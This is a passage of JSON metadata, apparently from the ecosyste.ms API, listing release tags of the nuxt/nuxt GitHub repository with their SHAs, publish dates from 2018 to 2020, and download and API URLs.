d71a8b91a91ca8f458fd64a278dd88d","kind":"tag","published_at":"2020-09-21T10:46:48.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.14.6","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.14.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.14.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.6/manifests"},{"name":"v2.14.5","sha":"3b037720f2edc3e351d200bbb8525df1e93d7aad","kind":"tag","published_at":"2020-09-10T12:36:26.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.14.5","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.14.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.14.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.5/manifests"},{"name":"v2.14.4","sha":"1a77fba4eb247faa3f1c8ec0fa49ce372abeb1d8","kind":"tag","published_at":"2020-08-27T10:26:49.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.14.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.14.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.14.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.4/manifests"},{"name":"v2.14.3","sha":"5e9d759d7bee6a3d32e16ef05eef988e882c600a","kind":"tag","published_at":"2020-08-16T17:04:29.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.14.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.14.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.14.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.3/manifests"},{"name":"v2.14.2","sha":"34c56722c8c97c0c6a59ecfbc5836c38047e4572","kind":"tag","published_at":"2020-08-16T10:59:06.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.14.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.14.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.14.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.2/manifests"},{"name":"v2.14.1","sha":"c30499d7e02cd6d8b51d97ee7d7a537d8a59f63b","kind":"tag","published_at":"2020-08-04T16:37:13.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.14.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.14.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.14.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.1/manifests"},{"name":"v2.14.0","sha":"60f68638cb80ab461c5b02be34e8797677bd8dd1","kind":"tag","published_at":"2020-07-27T17:25:24.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.14.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.0/manifests"},{"name":"v2.13.3","sha":"e3821ba78c23fafa753941a0c206bd23e39dd678","kind":"tag","published_at":"2020-07-02T18:08:18.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.13.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.13.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.13.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.13.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.13.3/manifests"},{"name":"v2.13.2","sha":"c998072c94eef659d45819eaa2b18897b8923538","kind":"tag","published_at":"2020-06-26T19:03:12.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.13.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.13.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.13.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.13.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.13.2/manifests"},{"name":"v2.13.1","sha":"56b158e7d689ba9f57e7aa83d672f5f32b18767b","kind":"tag","published_at":"2020-06-24T08:38:23.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.13.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.13.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.13.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.13.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.13.1/manifests"},{"name":"v2.13.0","sha":"dbecbe4adae6a7ae172eb01a232d1804c7b996bc","kind":"tag","published_at":"2020-06-18T17:45:27.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.13.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.13.0/manifests"},{"name":"v2.12.2","sha":"fb33bda6d114cde19b029ab71c810032ef51184f","kind":"tag","published_at":"2020-03-31T10:43:15.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.12.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.12.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.12.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.12.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.12.2/manifests"},{"name":"v2.12.1","sha":"8d355956d49c71349d165c4ca7531107e20d7b27","kind":"tag","published_at":"2020-03-25T19:22:04.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.12.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.12.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.12.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.12.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.12.1/manifests"},{"name":"v2.12.0","sha":"205a089f833f96298d9bd723aea15b93618ec05d","kind":"tag","published_at":"2020-03-17T16:45:28.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.12.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.12.0/manifests"},{"name":"v2.11.0","sha":"7af9ec8c23d247b22f71866b7b5dcd100f08048d","kind":"tag","published_at":"2019-12-17T10:23:56.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.11.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.11.0/manifests"},{"name":"v2.10.2","sha":"f6aa45dda605cae2ea51f7413c97190a7a02cb88","kind":"commit","published_at":"2019-10-21T21:16:29.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.10.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.10.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.10.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.10.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.10.2/manifests"},{"name":"v2.10.1","sha":"624c4c058e47fd36c484efaf1494b762f585f633","kind":"tag","published_at":"2019-10-11T08:11:06.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.10.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.10.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.10.1/manifests"},{"name":"v2.10.0","sha":"c17afa77a7c7490863c2040c8f448ba80082a891","kind":"tag","published_at":"2019-10-02T11:44:11.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.10.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.10.0/manifests"},{"name":"v2.9.2","sha":"c8ee9a660809e856c28d8678c6a632bbdd6ed00f","kind":"tag","published_at":"2019-08-28T11:32:13.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.9.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.9.2/manifests"},{"name":"v2.9.1","sha":"0157b971de97daecf2fadeafa5596ddaa30cdb28","kind":"tag","published_at":"2019-08-20T11:13:09.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.9.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.9.1/manifests"},{"name":"v2.9.0","sha":"ce3b4569613866a69b96f0f89aa2bb7d9810f8c4","kind":"tag","published_at":"2019-08-20T08:24:09.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.9.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.9.0/manifests"},{"name":"v2.8.1","sha":"2fabea9402864828fe9aafe8b0d13bcc674a1b3b","kind":"tag","published_at":"2019-06-04T20:28:35.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.8.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.8.1/manifests"},{"name":"v2.8.0","sha":"82ec7b7dedfbc3a01b981a0ef72375814e023291","kind":"tag","published_at":"2019-05-30T17:09:23.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.8.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.8.0/manifests"},{"name":"v2.7.1","sha":"0f609dfb3772ec2682bf67c42762df6041dab034","kind":"tag","published_at":"2019-05-14T18:56:35.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.7.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.7.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.7.1/manifests"},{"name":"v2.7.0","sha":"5a98230ec617582f7b9393ad27e20fb5a1e6aa04","kind":"tag","published_at":"2019-05-14T12:38:09.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.7.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.7.0/manifests"},{"name":"v2.6.3","sha":"2108cd669c56bb2e566c35ac73d8e693b5ce5c54","kind":"tag","published_at":"2019-04-25T08:43:24.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.6.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.6.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.6.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.6.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.6.3/manifests"},{"name":"v2.6.2","sha":"8d14cd4781095dff46a57ae05d60bbaccefb0fbd","kind":"tag","published_at":"2019-04-21T11:22:10.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.6.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.6.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.6.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.6.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.6.2/manifests"},{"name":"v2.6.1","sha":"c0776eb2d78f839d2b1249765d2eb117b5f32d2e","kind":"tag","published_at":"2019-04-04T17:58:06.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.6.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.6.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.6.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.6.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.6.1/manifests"},{"name":"v2.6.0","sha":"0e51676731e975226a7135003b941b9077256641","kind":"tag","published_at":"2019-04-04T17:06:17.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.6.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.6.0/manifests"},{"name":"v2.5.1","sha":"5d7757bf299c724bb52df529c5dbd1a341b19951","kind":"tag","published_at":"2019-03-21T21:48:39.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.5.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.5.1/manifests"},{"name":"v2.5.0","sha":"e2c296321b8f70c3e977ed11a0825870a2cc528a","kind":"tag","published_at":"2019-03-21T13:07:34.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.5.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.5.0/manifests"},{"name":"v2.4.5","sha":"0ad13e04d2cae232d807ba0dd100b8f3f7bbb010","kind":"commit","published_at":"2019-02-26T10:31:42.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.4.5","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.4.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.4.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.4.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.4.5/manifests"},{"name":"v2.4.3","sha":"13e494c0f0013252994eb0de0c4d92bd507b119d","kind":"tag","published_at":"2019-02-06T15:56:54.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.4.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.4.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.4.3/manifests"},{"name":"v2.4.2","sha":"32b0f155c97a5c7f7cb7cc450274e10a492c9c39","kind":"tag","published_at":"2019-01-30T15:15:06.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.4.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.4.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.4.2/manifests"},{"name":"v2.4.0","sha":"5f221b4b7e39e4804bde682b2e71780a7a1e2845","kind":"tag","published_at":"2019-01-28T17:41:28.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.4.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.4.0/manifests"},{"name":"v1.4.5","sha":"c8962964b8ced4c703804ed9cc5e54c6d486a321","kind":"tag","published_at":"2018-11-27T17:37:42.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.4.5","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.4.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v1.4.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.4.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.4.5/manifests"},{"name":"v2.3.4","sha":"16c5b892fa3104992f3a6778ac97a0fcb1ca657c","kind":"tag","published_at":"2018-11-26T17:50:03.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.3.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.3.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.3.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.3.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.3.4/manifests"},{"name":"v2.3.2","sha":"205c9d38156c60d93248b9d973a615eee7355f22","kind":"tag","published_at":"2018-11-20T20:49:05.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.3.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.3.2/manifests"},{"name":"v2.3.1","sha":"f75a4423354f16603a6b733ca12d873e501f4442","kind":"tag","published_at":"2018-11-16T19:28:01.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.3.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.3.1/manifests"},{"name":"v1.4.4","sha":"8fb8376ff70b9db5feda4492009b0fb7d3e2884a","kind":"tag","published_at":"2018-10-19T14:00:22.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.4.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.4.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v1.4.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.4.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.4.4/manifests"},{"name":"v1.4.3","sha":"f5aff938f7742624708b4eecc7a2b003c1a1d161","kind":"tag","published_at":"2018-10-19T13:45:13.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.4.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v1.4.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.4.3/manifests"},{"name":"v2.3.0","sha":"dbf3ccc4c142083a76fbc4f3281f04e9b3044b79","kind":"commit","published_at":"2018-10-17T21:35:43.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.3.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.3.0/manifests"},{"name":"v2.2.0","sha":"e3b72ded5c56b62ca25f180390a1d60ce8123b5b","kind":"tag","published_at":"2018-10-13T19:07:52.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.2.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.2.0/manifests"},{"name":"v2.1.0","sha":"fdb225fbeb452a421f1484e3a1a16f26952d386e","kind":"tag","published_at":"2018-09-30T16:28:05.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.1.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.1.0/manifests"},{"name":"v2.0.0","sha":"7a68e1dde17e0ed7eb7598d9c63ca1ac2383b76e","kind":"commit","published_at":"2018-09-20T21:57:16.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.0.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.0.0/manifests"},{"name":"v1.4.2","sha":"376dd35ba9465e1163a800bd0512654f68436b5f","kind":"tag","published_at":"2018-08-01T19:59:59.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.4.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v1.4.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.4.2/manifests"},{"name":"v1.4.1","sha":"5b7e27a1af4aa0d212766513693949f9d7917bd5","kind":"tag","published_at":"2018-06-06T13:01:31.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.g